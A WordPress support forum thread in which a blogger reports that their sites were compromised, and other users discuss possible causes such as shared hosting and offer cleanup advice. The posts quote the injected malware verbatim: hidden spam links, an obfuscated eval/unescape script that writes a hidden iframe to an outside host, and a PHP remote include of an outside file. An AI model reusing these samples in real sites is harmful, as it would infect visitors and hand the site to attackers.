Title: WordPress Exploit: script inserted into code
Last modified: August 19, 2016

---

# WordPress Exploit: script inserted into code

 *  [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/)
 * Lately some of my WordPress blogs have been targeted by some hacker. Everytime
   I check out the source of my blogs I see these kind of links:
 *     ```
       </body></html><font style='position: absolute;overflow: hidden;height: 0;width: 0'>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra.htm"; title="buy viagra">buy viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online.htm"; title="buy viagra online">buy viagra online</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online-viagra.htm"; title="buy viagra online viagra">buy viagra online viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=viagra-buy.htm"; title="viagra buy">viagra buy</a>
       ```
   
 * It has nothing to do with my theme, I’m using my own theme and I am 100% sure
   that the theme is not the source of the problem.
 * I have been monitoring my weblogs to see what the cause of the problem is. Here
   is a list of what I tried to stop it:
 * – Upgrade to the latest WP (Yet it kept coming back)
    – Secure WP admin with 
   htaccess (No effect) – Change FTP password – Check permissions of files and folders–
   Check plugins
 * Another thing that I noticed is the following. Almost all of my themes also had
   the following code inserted at the end of the source code:
 *     ```
       <Script>
       <!--
       var d=document;
       eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%28%65%6c%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%29%2e%6c%65%6e%67%74%68%29%7b%69%66%28%20%28%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%5b%69%5d%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%5b%69%5d%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%5b%69%5d%2e%6e%61%6d%65%21%3d%63%31%20%29%20%7b%65%6c%5b%69%5d%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%5b%69%5d%29%3b%7d%69%20%2b%2b%3b%7d%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%35%37%30%29%2b%27%33%66%61%66%61%30%30%64%36%62%5c%27%20%77%69%64%74%68%3d%31%30%37%20%68%65%69%67%68%74%3d%35%31%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
       //-->
       </Script>
       ```
   
 * What I noticed is that the only solution was to rewrite the old WordPress files
   with the ones that I downloaded. I finally found where the code was being inserted:
   index.php in the root folder of the weblog.
 * I would like to know the following things:
 * – Is this because of my setup or is this some new WP exploit?
    – What can I do
   to stop these kind of exploits in the future?
 * Thanks!

Viewing 15 replies - 1 through 15 (of 21 total)

1 [2](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/?output_format=md)

 *  [Jeremy Clark](https://wordpress.org/support/users/jeremyclark13/)
 * (@jeremyclark13)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718111)
 * [Post released from Askimet que]
 *  [sensifreak](https://wordpress.org/support/users/sensifreak/)
 * (@sensifreak)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718113)
 * its an xss i think have you got a link to your site ?
 *  [sensifreak](https://wordpress.org/support/users/sensifreak/)
 * (@sensifreak)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718115)
 * if its the amsterdam delete the comments i made they are secure
 *  Thread Starter [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718151)
 * I found a temporary fix for the problem:
    I chmodded index.php to 444. That seems
   to stop the problem at this moment.
 * Is there anything else I can do?
 *  Thread Starter [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718225)
 * The problem is back again.
 * Now they attacked the Wp-content index.php file
    This is what I found:
 *     ```
       <?php
       // Silence is golden.
   
       require('http://lovetabs.rxfeel.com/files/temp.php');
   
       ?>
       ```
   
 *  [viper007bond](https://wordpress.org/support/users/viper007bond/)
 * (@viper007bond)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718229)
 * I’d talk to your host.
 *  Thread Starter [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718232)
 * Apparently I am not the only one:
 * [http://support.technorati.com/discussions/topic/3295](http://support.technorati.com/discussions/topic/3295)
 * Technorati noticed the issue also and mailed every single member that uses WordPress.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718233)
 * _Technorati noticed the issue also and mailed every single member that uses WordPress._
 * Thats simply not true, since I didnt get an e-mail. In fact, they have no way
   of doing such a thing.
 *  [mvandemar](https://wordpress.org/support/users/mvandemar/)
 * (@mvandemar)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718236)
 * Yeah, I didn’t get an email either. They must not love you and me whoo. 😛
 * Ian did post about it on the Technorati blog though. Any ideas what might be 
   going on?
 *  [Michael Torbert](https://wordpress.org/support/users/hallsofmontezuma/)
 * (@hallsofmontezuma)
 * WordPress Virtuoso
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718238)
 * I wouldn’t be too worried. It could be something, but a lot of people have crappy/
   insecure servers and then blame WordPress when they’re compromised.
    I have many
   many WordPress installations on a variety of different servers, and have never
   had one hacked.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718247)
 * I’m running WordPress 2.5.1 and today got the same problem. Does anyone knows,
   how can i prevent it?
 * Site is [http://dvicr.com](http://dvicr.com). Code inserted on every index.php
   and every htm page on all my sites (my sites share same space on godaddy).
 *  [obscure](https://wordpress.org/support/users/obscure/)
 * (@obscure)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718250)
 * > Here is a list of what I tried to stop it:
   > – Upgrade to the latest WP (Yet it kept coming back)
   >  – Secure WP admin with
   > htaccess (No effect) – Change FTP password – Check permissions of files and
   > folders – Check plugins
 * Did you change your admin password?
    Did you delete all the compromised files
   and posts?
 *  [Marcel Brinkkemper](https://wordpress.org/support/users/macbrink/)
 * (@macbrink)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718251)
 * Are you on a shared host?
    Some user on the same host could use scripts to insert
   the code on your site. I’d talk to your host about this soon.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718252)
 * > Are you on a shared host?
   >  Some user on the same host could use scripts to 
   > insert the code on your site. I’d talk to your host about this soon.
 * Yes, I’m on shared host, but it’s pretty secure (godaddy.com), so I don’t think
   anyone can break into other users area.
 * > Did you change your admin password?
   >  Did you delete all the compromised files
   > and posts?
 * Sure, and I also secured blog with all the knowledge I have. No evil scripts 
   so far. I still wonder, how it got there in first place.
 *  [Michael Torbert](https://wordpress.org/support/users/hallsofmontezuma/)
 * (@hallsofmontezuma)
 * WordPress Virtuoso
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718255)
 * On all your sites? Doesn’t sound like a WordPress issue to me. Odds are, your
   server account or server itself has been compromised.
    Change _all_ your server
   passwords (including mysql).

Viewing 15 replies - 1 through 15 (of 21 total)

1 [2](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/?output_format=md)

The topic ‘WordPress Exploit: script inserted into code’ is closed to new replies.

 * In: [Developing with WordPress](https://wordpress.org/support/forum/wp-advanced/)
 * 21 replies
 * 12 participants
 * Last reply from: [segal](https://wordpress.org/support/users/segal/)
 * Last activity: [18 years ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718270)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics